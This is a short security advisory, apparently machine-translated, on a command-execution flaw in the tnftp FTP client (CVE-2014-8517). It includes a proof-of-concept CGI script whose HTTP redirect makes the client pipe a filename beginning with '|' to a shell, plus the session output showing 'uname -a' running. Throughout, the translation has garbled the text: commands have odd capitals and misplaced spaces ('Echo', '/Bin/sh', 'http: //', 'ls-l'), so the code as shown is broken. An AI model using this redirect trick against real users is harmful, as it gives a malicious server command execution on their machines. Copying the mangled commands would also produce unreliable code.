Arbitrary Command Execution Vulnerability in tnftp ftp client (CVE-2014-8517)

Arbitrary Command Execution Vulnerability in tnftp ftp client (CVE-2014-8517)

Release date:
Updated on:

Affected Systems:
NetBSD tnftp
Description:
CVE (CAN) ID: CVE-2014-8517

Tnftp is a widely used NetBSD FTP client.

Tnftp has a security vulnerability that allows attackers to execute arbitrary commands. This vulnerability affects multiple versions of Linux (Fedora, Debian, NetBSD, FreeBSD, OpenBSD) and Apple Yosemite 10.10.

When the victim uses the "ftp http: // server/path/file.txt" command but does not use the "-o" parameter to specify the output file, the malicious server can execute any command through tnftp.

<* Source: Jared Mcneill
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Jared Mcneill () provides the following test methods:

If you do "ftp http: // server/path/file.txt"; and don't specify an output
Filename with-o, the ftp program can be tricked into executing
Arbitrary commands.

The FTP client will follow HTTP redirects, and uses the part of
Path after the last/from the last resource it accesses as the output
Filename (as long as-o is not specified ).

After it resolves the output filename, it checks to see if the output
Filename begins with a "|", and if so, passes the rest
Popen (3): http://nxr.netbsd.org/xref/src/usr.bin/ftp/fetch.c#1156

Here's a simple CGI script that causes ftp to execute "uname-a",
Issue is present on both NetBSD 7.99.1 and OSX 10.10:

A20 $ pwd
/Var/www/cgi-bin
A20 $ ls-l
Total 4
-Rwxr-xr-x 1 root wheel 159 Oct 14 redirect
-Rwxr-xr-x 1 root wheel 178 Oct 14 | uname-
A20 $ cat redirect
#! /Bin/sh
Echo 'status: 302 Found'
Echo 'content-Type: text/html'
Echo 'Connection: keep-alive'
Echo 'location: http: // 192.168.2.19/cgi-bin/| uname % 20-a'
Echo
A20 $
A20 $ ftp http: // localhost/cgi-bin/redirect
Trying: 1: 80...
Ftp: Can't connect to ': 1: 80': Connection refused
Trying 127.0.0.1: 80...
Requesting http: // localhost/cgi-bin/redirect
Redirected to http: // 192.168.2.19/cgi-bin/| uname % 20-a
Requesting http: // 192.168.2.19/cgi-bin/| uname % 20-a
32 101.46 KiB/s
32 bytes retrieved in (78.51 KiB/s)
NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
ADT 2014
Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
BOARD evbarm
A20 $

Suggestion:
Vendor patch:

NetBSD
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://ftp.netbsd.org/pub/pkgsrc/current/pkgsrc/net/tnftp/README.html

Refer:
Http://seclists.org/oss-sec/2014/q4/459
Http://seclists.org/oss-sec/2014/q4/459
Http://seclists.org/oss-sec/2014/q4/460
Http://netbsd.org/

This article permanently updates the link address: